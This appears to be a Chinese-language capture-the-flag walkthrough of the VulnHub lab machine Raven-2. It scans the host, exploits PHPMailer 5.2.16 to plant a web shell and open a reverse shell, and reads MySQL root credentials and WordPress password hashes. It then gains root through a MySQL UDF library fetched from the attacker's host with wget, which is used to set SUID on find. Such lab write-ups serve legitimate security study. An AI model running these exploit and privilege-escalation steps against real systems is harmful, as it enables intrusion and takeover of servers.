【OSCP-vulnhub】Raven-2

端口掃描

本地/etc/hosts文件解析

目錄掃描：

第一個flag

利用msf下載exp

flag2

flag3

Mysql登錄

查看mysql的運行權限

MySql提權：UDF

查看數據庫寫入條件

查看插件目錄

查看是否可以遠程登錄

gcc編譯.o文件

創建so文件

創建臨時監聽

執行sql語句

創建數據表feng

插入數據文件

導出數據

創建自定義函數do_system

查詢一下添加的函數

利用do_system給find命令賦予suid權限

find命令提權

The end(獲取flag)

flag4{df2bc5e951d91581467bb9a2a8ff4425}

端口掃描

nmap -sS -p- 192.168.56.105 -sV -A --version-all -sC

訪問網站發現沒什么可關注的點，點到blog的時候顯示不可訪問

這個時候就聯想到了

本地/etc/hosts文件解析

就能正常訪問了。。

目錄掃描：

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.105

誒嘿，掃出了蠻多個目錄的

在/vendor/PATH發現

第一個flag

在readme發現很多關于PHPMailer的信息

以及http://192.168.56.105/vendor/VERSION在這里面提示版本為5.2.16

我們隨即便去查找一下相關的exp

利用msf下載exp

修改代碼

依次修改可以發送郵件的路徑，要定義的后門文件/shell.php,要回連的地址以及端口，還有網站的后門文件保存路徑

python 40974.py

接著訪問/contact.php觸發后門文件再訪問/shell.php就可以進行反彈shell。。。

建立交互式終端

python -c?'import pty;pty.spawn("/bin/bash")'

查找flag

find / -name flag*?

找到兩個有關flags的信息

?/var/www/flag2.txt
?/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

flag2

cat /var/www/flag2.txt

flag3

接著在wordpress目錄發現數據庫密碼

用戶名：root，密碼：R@v3nSecurity

Mysql登錄

mysql -uroot -pR@v3nSecurity

mysql> show databases;

mysql> use wordpress

mysql> show tables;

select * from wp_users;

michael? ? |?BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven? ? ?|?B6X3H3ykawf2oHuPsbjQiih5iJXqad.

查看mysql的運行權限

是root權限在運行

ps -aux | grep mysql

MySql提權：UDF

查看數據庫寫入條件

show global variables like 'secure%';

+------------------+-------+ | Variable_name ? ?| Value | +------------------+-------+ | secure_auth ? ? ?| OFF ? | | secure_file_priv | ? ? ? | +------------------+-------+

?1）當 secure_file_priv 的值為?NULL?，表示限制 mysqld 不允許導入|導出，此時無法提權

?2）當 secure_file_priv 的值為?/tmp/?，表示限制 mysqld 的導入|導出只能發生在 /tmp/目錄下，此時也無法提權

?3）當 secure_file_priv 的值沒有具體值時，表示不對 mysqld 的導入|導出做限制，此時可提權! 如果是 MySQL >= 5.1 的版本，必須把 UDF 的動態鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創建自定義函數。

查看插件目錄

show variables like '%plugin%';

+---------------+------------------------+ | Variable_name | Value ? ? ? ? ? ? ? ? ?| +---------------+------------------------+ | plugin_dir ? ?|?/usr/lib/mysql/plugin/?| +---------------+------------------------+

查看是否可以遠程登錄

use mysql

select user,host from user;

發現root用戶不允許遠程登錄，所以不能使用MSF提權

searchsploit udf

gcc編譯.o文件

gcc -g -c?1518.c

創建so文件

gcc -g -shared -Wl,-soname,exp.so -o?exp.so?1518.o -lc

?-g 生成調試信息

?-c 編譯（二進制）

?-shared：創建一個動態鏈接庫，輸入文件可以是源文件、匯編文件或者目標文件。

?-Wl,-soname,exp.so

-Wl?表示將后續參數傳遞給鏈接器（ld）。

-soname,exp.so?設置動態庫的?內部名稱（SONAME），影響動態鏈接時的庫查找行為。

?-o：執行命令后的文件名

?-lc：-l 庫 c庫名

創建臨時監聽

python -m http.server?8080

wget http://192.168.56.103:8080/1518.so -O test.so

執行sql語句

use mysql;

創建數據表feng

create table feng(line blob);

插入數據文件

insert into feng values(load_file('/tmp/test.so'));

導出數據

outfile 多行導出，dumpfile一行導出

select * from feng into dumpfile '/usr/lib/mysql/plugin/test.so';

創建自定義函數do_system

(或者sys_exec)類型是integer，別名（soname）文件名字

create function do_system returns integer soname 'test.so';

查詢一下添加的函數

select * from mysql.func;

利用do_system給find命令賦予suid權限

select do_system('chmod u+s /usr/bin/find');

find命令提權

創建一個文件：touch feng

find / -name feng -exec "/bin/sh" \;

id uid=33(www-data) gid=33(www-data)?euid=0(root)?groups=33(www-data)

The end(獲取flag)

cd?/rootlscat flag4.txt ?

flag4{df2bc5e951d91581467bb9a2a8ff4425}

好啦，本文的內容就到這了，希望對你有所幫助。。

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/diannao/80208.shtml
繁體地址，請注明出處：http://hk.pswp.cn/diannao/80208.shtml
英文地址，請注明出處：http://en.pswp.cn/diannao/80208.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！